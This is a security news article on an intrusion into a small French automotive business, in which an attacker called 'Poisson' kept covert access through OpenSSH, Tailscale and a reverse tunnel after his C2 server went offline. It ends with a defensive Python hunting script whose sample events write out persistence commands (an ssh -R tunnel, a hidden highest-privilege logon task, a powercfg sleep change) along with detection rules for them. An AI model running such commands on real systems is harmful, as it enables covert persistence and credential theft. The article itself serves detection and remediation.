A recent cyber intrusion into a small French automotive business has highlighted a critical gap in typical cybersecurity remediation strategies. A French-speaking attacker known as “Poisson” established a secondary, covert access channel before his primary command-and-control (C2) server was taken offline, which ensured continued access to the victim’s network even after the initial intrusion vector was seemingly neutralized. Researchers at Cato Networks captured the full operation, providing a rare, granular view of the attacker’s actions from his own perspective.
The incident underscores a stark lesson for businesses: simply disabling a C2 server is insufficient if the attacker has proactively built a persistent backdoor. In this case, Poisson installed OpenSSH and Tailscale on the victim’s machine, creating an independent route that bypassed the now-dormant C2 infrastructure. This resilience meant that when the Havoc C2 server went dark, Poisson’s access remained intact, and he was able to reconnect 18 days later to continue his activities.
A Learning Attacker’s Persistent Access
The actor, operating under the handle “Poisson,” appears to be a less experienced operator, exhibiting what researchers described as a “school schedule” of activity, with consistent operation times. Despite thin tradecraft, evidenced by instances of leaking his own home directory and naming storage buckets after himself, Poisson managed to compromise four machines. His methods, while sometimes faltering, ultimately proved effective in establishing a persistent presence.
The malware’s execution was largely in-memory, utilizing a VBScript stager, a PowerShell loader, and a .NET loader designed to run Havoc’s Demon agent without writing the implant to disk. For privilege escalation, Poisson utilized a standard `Start-Process -Verb RunAs` command, which requires user interaction via the Windows User Account Control (UAC) prompt. This required multiple attempts on one victim, taking over a dozen tries across two days.
To ensure long-term access, Poisson established a scheduled task designed to run at every login with the highest privileges. He also injected shellcode into Explorer.exe and deployed a custom-built RustDesk as a fallback communication channel. His primary method of credential harvesting involved a straightforward 70-line Python keylogger. This tool saved keystrokes to a local file, which Poisson then manually retrieved. He also employed the `powercfg` command to prevent victim machines from entering sleep mode, thereby ensuring continuous data collection.
The Critical Persistence Layer
The defining move of this operation occurred on April 7. During a five-hour session, Poisson installed OpenSSH Server and Tailscale on the compromised machine. He then connected the victim’s system to his private Tailscale network, establishing SSH-based access and a reverse tunnel. This setup allowed him to access the machine through Tailscale’s encrypted mesh network without relying on the C2 server or exposing any services externally.
The following day, the Havoc C2 infrastructure went offline. Cato does not specify the reason for this downtime, but its impact was mitigated by Poisson’s foresight: the Tailscale connection operated on an entirely separate network, so his access persisted. When the original C2 server reappeared on April 26, the agents automatically reconnected, eliminating the need for a fresh compromise.
In the final five days of the observed activity, Poisson executed 145 additional commands. He probed smart-card and certificate stores, suggesting an interest in certificate-based authentication methods. Additionally, he ran two unexplained executables from a file named Thales.zip for approximately 32 minutes before deleting 17 files and ceasing activity on May 1. His objective appeared narrow, focusing on direct financial gain through credentials rather than wider lateral movement or ransomware deployment. He targeted banking logins, email passwords, and government portal credentials, which represent immediate financial exposure for a small business owner.
The tools employed by Poisson are not novel. Tailscale has been used by advanced persistent threats (APTs) like China’s APT31, and legitimate remote-access tools such as Ngrok and Fleetdeck have been leveraged by groups like Scattered Spider. RustDesk, Poisson’s backup channel, has also appeared in recent Akira ransomware intrusions. The use of signed, legitimate binaries makes detection difficult for security solutions that rely solely on identifying malicious files rather than analyzing suspicious behavior.
Cato Networks has outlined several key indicators for cybersecurity professionals to monitor:
- Alerts for OpenSSH Server installations on Windows workstations, as this is rarely a legitimate configuration for typical end-user machines.
- Monitoring for the presence of `tailscale.exe` on systems not expected to utilize VPNs.
- Detection of `ssh -R` reverse tunnels directed towards external hosts.
- Identification of `wscript.exe` executing .vbs files from user staging folders.
- Flagging scheduled tasks configured with the highest privileges that launch script interpreters.
- Watching for changes to standby timeout settings via `powercfg` that keep machines active.
- Blocking access to DuckDNS, which was used for dynamic DNS resolution.
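As an added example that is not code from the Cato report or from this article, the following Python turns the indicators above into hunting rules and runs them over a handful of constructed Sysmon-style events (Event ID 1 process creation and Event ID 22 DNS query). The event field names (`id`, `image`, `cmdline`, `query`) and every sample value are assumptions made for the example; they are shaped to resemble the tradecraft described in the article, not taken from the actual intrusion. Each rule returns a boolean so it can be lifted into a SIEM query, and benign events are included to show the rules staying quiet.

```python
import re

# --- Constructed sample telemetry (assumption: Sysmon-like field names) ---
SAMPLE_EVENTS = [
    # wscript.exe running a .vbs staged under a user profile folder
    {"id": 1, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\AppData\Local\Temp\update.vbs"'},
    # OpenSSH Server being added to a workstation
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0"},
    # Tailscale client appearing on a host that should not run a VPN
    {"id": 1, "image": r"C:\Program Files\Tailscale\tailscale.exe",
     "cmdline": "tailscale.exe up"},
    # SSH reverse tunnel (-R) towards another host
    {"id": 1, "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": "ssh.exe -N -R 2222:localhost:22 user@100.64.0.5"},
    # Logon-triggered task with highest privileges launching a script interpreter
    {"id": 1, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /Create /SC ONLOGON /RL HIGHEST /TN Updater /TR "powershell.exe -w hidden -f C:\Users\alice\AppData\Roaming\u.ps1"'},
    # Standby timeout disabled so the machine never sleeps
    {"id": 1, "image": r"C:\Windows\System32\powercfg.exe",
     "cmdline": "powercfg.exe /change standby-timeout-ac 0"},
    # DNS lookup of a DuckDNS dynamic-DNS name
    {"id": 22, "image": r"C:\Users\alice\AppData\Local\Temp\agent.exe",
     "query": "example-host.duckdns.org"},
    # Benign events that must not fire any rule
    {"id": 1, "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
    {"id": 22, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "query": "www.example.com"},
]

SCRIPT_INTERPRETERS = ("powershell", "pwsh", "wscript", "cscript", "mshta", "cmd.exe")
# Paths under a user profile that are typical staging locations for droppers.
USER_STAGING = re.compile(r"\\users\\[^\\]+\\(appdata|downloads|desktop|documents)\\", re.I)


def _image_is(ev, name):
    return ev["image"].lower().endswith("\\" + name)


def openssh_server_install(ev):
    # Either sshd.exe itself running, or the OpenSSH.Server capability being added.
    return ev["id"] == 1 and (_image_is(ev, "sshd.exe")
                              or "openssh.server" in ev.get("cmdline", "").lower())


def tailscale_present(ev):
    return ev["id"] == 1 and _image_is(ev, "tailscale.exe")


def ssh_reverse_tunnel(ev):
    cl = ev.get("cmdline", "")
    return ev["id"] == 1 and _image_is(ev, "ssh.exe") and re.search(r"(^|\s)-R\s", cl) is not None


def vbs_from_user_staging(ev):
    cl = ev.get("cmdline", "")
    return (ev["id"] == 1 and _image_is(ev, "wscript.exe")
            and ".vbs" in cl.lower() and USER_STAGING.search(cl) is not None)


def highest_priv_task_with_interpreter(ev):
    cl = ev.get("cmdline", "").lower()
    return (ev["id"] == 1 and _image_is(ev, "schtasks.exe")
            and "/create" in cl and "/rl highest" in cl
            and any(interp in cl for interp in SCRIPT_INTERPRETERS))


def powercfg_standby_change(ev):
    cl = ev.get("cmdline", "").lower()
    return ev["id"] == 1 and _image_is(ev, "powercfg.exe") and "standby-timeout" in cl


def duckdns_query(ev):
    return ev["id"] == 22 and ev.get("query", "").lower().endswith(".duckdns.org")


RULES = [
    ("openssh_server_install", openssh_server_install),
    ("tailscale_present", tailscale_present),
    ("ssh_reverse_tunnel", ssh_reverse_tunnel),
    ("vbs_from_user_staging", vbs_from_user_staging),
    ("highest_priv_task_with_interpreter", highest_priv_task_with_interpreter),
    ("powercfg_standby_change", powercfg_standby_change),
    ("duckdns_query", duckdns_query),
]


def hunt(events):
    """Return (rule_name, event) pairs for every event that trips a rule."""
    return [(name, ev) for ev in events for name, rule in RULES if rule(ev)]


def summarize(events):
    """Count hits per rule; a non-zero count on a workstation is worth a look."""
    counts = {name: 0 for name, _ in RULES}
    for name, _ in hunt(events):
        counts[name] += 1
    return counts


if __name__ == "__main__":
    for name, ev in hunt(SAMPLE_EVENTS):
        print(f"[{name}] {ev['image']} :: {ev.get('cmdline', ev.get('query', ''))}")
```

Each of the seven indicators fires exactly once on the constructed sample, and the two benign events are silent. In a real deployment the same predicates would be expressed against the process-creation and DNS telemetry the EDR or Sysmon pipeline already collects; the point of a reverse-tunnel or VPN-client rule is that it catches the persistence layer that survives a C2 takedown, so these hits should be triaged as part of the same incident rather than as unrelated software-inventory noise.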
The overarching lesson is to treat a disabled C2 server as only one part of a potential compromise. Organizations must actively search for secondary persistence mechanisms that attackers may have established. The true impact of such intrusions lies not just in the initial breach, but in the attacker’s ability to maintain access through hidden backdoors. If an attacker can maintain access through OpenSSH, Tailscale, scheduled tasks, or keyloggers even after the C2 is gone, the threat remains active. This is a critical gap in many current remediation strategies.
The exact nature of the executables within Thales.zip and their specific actions remain an open question. However, the more significant takeaway is the fundamental principle: the C2 server was merely one entry point. Disabling it while leaving other persistent access methods intact means the attacker still holds a key to the network. Understanding and eradicating these secondary persistence layers is paramount to achieving true remediation.